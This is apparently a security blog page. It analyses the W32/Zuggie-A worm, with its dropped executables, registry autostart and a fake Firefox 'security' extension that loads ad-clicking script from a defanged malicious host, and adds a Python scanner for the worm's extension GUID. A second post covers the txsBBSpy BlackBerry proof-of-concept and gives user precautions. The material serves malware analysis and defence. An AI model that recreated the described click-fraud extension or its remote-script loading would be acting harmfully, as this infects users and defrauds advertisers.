  • Program Files\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\chrome\content\timer.xul
  • Program Files\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\chrome.manifest
  • Program Files\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\install.rdf
  • System\googlebuzz.exe - copy of W32/Zuggie-A
  • System\GoogleUpte.exe - copy of W32/Zuggie-A

W32/Zuggie-A modifies the registry to autostart GoogleUpte.exe and googlebuzz.exe.
A quick search shows that the CLSID: 9CE11043-9A15-4207-A565-0C94C42D590D has previously been seen in multiple worms. This supports my theory that this is a hastily assembled worm built from recycled malware. I fired up a copy of Firefox on the infected machine and, as determined from analysis, found an installed Firefox extension called Firefox security 2.0 - Internal security options editor under the extensions tab of Firefox Add-ons.
This “security extension” adds a JavaScript component (timer.xul) that is triggered when the browser visits yahoo.com, bing.com, google.com, aol.com/aol/search or ask.com, and executes JavaScript hosted on:
searchrequest1 . com / request . php ? aid = blackout
which silently clicks all Google or Yahoo ads displayed on the search results page (hey, why not make a few bucks while infecting, eh?).
Google Buzz is new and is garnering quite a bit of interest and adoption among Internet users including myself. Clearly the malware authors view Google Buzz as the fresh big lucrative social fruit to exploit much like they have done with Facebook, MySpace, Hi5 and others. So in the coming weeks and months I predict we will see a host of new malware exploiting or attempting to exploit Google Buzz as the malware authors figure out its internals. This may have only been an exploratory attempt or a quick response to the latest craze - only time will tell.
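The file-system indicators above (the extension GUID and the timer.xul trigger script) are enough for a simple host check. The following is an added example, not code from the post or from any vendor: it scans a Firefox extensions directory (the path is supplied by the caller, e.g. the Program Files\Mozilla Firefox\extensions directory named above) and flags extensions that declare the W32/Zuggie-A GUID in install.rdf or carry a chrome/content/timer.xul. The sample profile it builds is constructed inline; the benign extension name is made up.

```python
"""Added example (not from the post): flag Firefox extensions carrying the W32/Zuggie-A indicators."""
import os
import tempfile
import xml.etree.ElementTree as ET

ZUGGIE_GUID = "{9CE11043-9A15-4207-A565-0C94C42D590D}"  # extension GUID quoted in the post
RDF = "{http://www.w3.org/1999/02/22-rdf-syntax-ns#}"
EM = "{http://www.mozilla.org/2004/em-rdf#}"


def extension_id(install_rdf):
    """Return the em:id declared in an install.rdf, or None if absent or unparseable."""
    try:
        desc = ET.parse(install_rdf).getroot().find(RDF + "Description")
    except (ET.ParseError, OSError):
        return None
    node = None if desc is None else desc.find(EM + "id")
    return node.text.strip() if node is not None and node.text else None


def scan_extensions(extensions_dir):
    """Return {extension_dir_name: [reasons]} for every extension matching an indicator."""
    findings = {}
    for name in sorted(os.listdir(extensions_dir)):
        path = os.path.join(extensions_dir, name)
        if not os.path.isdir(path):
            continue
        reasons = []
        if ZUGGIE_GUID in (name, extension_id(os.path.join(path, "install.rdf"))):
            reasons.append("known W32/Zuggie-A GUID")
        if os.path.exists(os.path.join(path, "chrome", "content", "timer.xul")):
            reasons.append("chrome/content/timer.xul present")
        if reasons:
            findings[name] = reasons
    return findings


def build_sample_profile():
    """Constructed sample: one benign extension and one laid out like the Zuggie-A extension."""
    root = tempfile.mkdtemp()
    rdf = ('<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" '
           'xmlns:em="http://www.mozilla.org/2004/em-rdf#"><Description>'
           '<em:id>%s</em:id><em:name>%s</em:name></Description></RDF>')
    for guid, ename, has_xul in ((ZUGGIE_GUID, "Firefox security 2.0", True),
                                 ("benign@example.test", "Benign Extension", False)):
        ext = os.path.join(root, guid)
        os.makedirs(os.path.join(ext, "chrome", "content"))
        with open(os.path.join(ext, "install.rdf"), "w") as fh:
            fh.write(rdf % (guid, ename))
        if has_xul:  # empty stand-in for the trigger script; only its presence is checked
            open(os.path.join(ext, "chrome", "content", "timer.xul"), "w").close()
    return root
```

Pair this with a check of the Run keys the post mentions (GoogleUpte.exe and googlebuzz.exe) and, if you have proxy logs, requests to the searchrequest1 host with the search engines above as referrer.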

Friday, February 12, 2010

Between a PoC and a Hard Place

Several reports have been published detailing a Blackberry proof of concept (PoC) exploit called txsBBSpy that was recently presented at a security conference. Although it may not have been the aim of the original presenter, some reports have framed the PoC as being able to exploit so-called vulnerabilities that the writers believe to be present in the Blackberry platform. The “vulnerabilities” involve secretly forwarding incoming emails, locating devices by way of their GPS capabilities, eavesdropping on conversations by surreptitiously turning on microphones, and other such nefarious behavior.
Although the vectors used for the PoC itself weren’t exactly ground-breaking, it does highlight the fact that competition between mobile platform vendors to provide easy-to-use APIs (and thus attract developers) has made it possible to write malicious applications for mobile devices in less time than ever before.
So, does this mean the existence of easy-to-use APIs makes mobile devices unsafe? The answer is: not really. While over the years it has become easier to work with mobile development platforms, and the amount of time it takes to bring a new and fully featured software product to market has decreased, this has also meant that platform vendors have simultaneously had to introduce steps to ensure that new API features are not being used for malicious purposes.
Vendors take different approaches to ensuring the security and integrity of applications written for mobile platforms, such as restricting application security policies, providing a single point of distribution, mandating application signing, and restricting applications that may be installed to those that have been approved (with the possibility of future revocation if an application is found to be questionable). However, these steps can never be 100% reliable, and as such, situations may arise in which malicious applications sneak through, as happened last year. This is where the case for mobile security products can be made.
Some simple precautions that end users can take include:
•    Watch out for unusually high battery consumption. Although this sounds simple, many threats written for mobile platforms are not designed to run efficiently, which means that resource usage can be extremely high.
•    Be sure to check the device’s Bluetooth settings. Ensure that devices are set to be “hidden” and not “discoverable.”
•    Keep track of your normal levels of data usage and contact your service provider if you become aware of significant increases that you cannot account for.
•    Report any prompts to send premium-rate messages.
•    Periodically confirm the applications installed on your mobile device and report any entries you did not specifically approve.
•    Avoid granting “Trusted Application” status unless absolutely required, since it may allow malicious code access to confidential data.


As more and more developers move towards mobile application development, mobile devices are becoming ever more sophisticated and are increasingly being used to store critical personal data. Mobile device manufacturers will have to walk the fine line between providing comprehensive APIs and preventing malicious applications from gaining unfettered access to user content and other potentially sensitive data.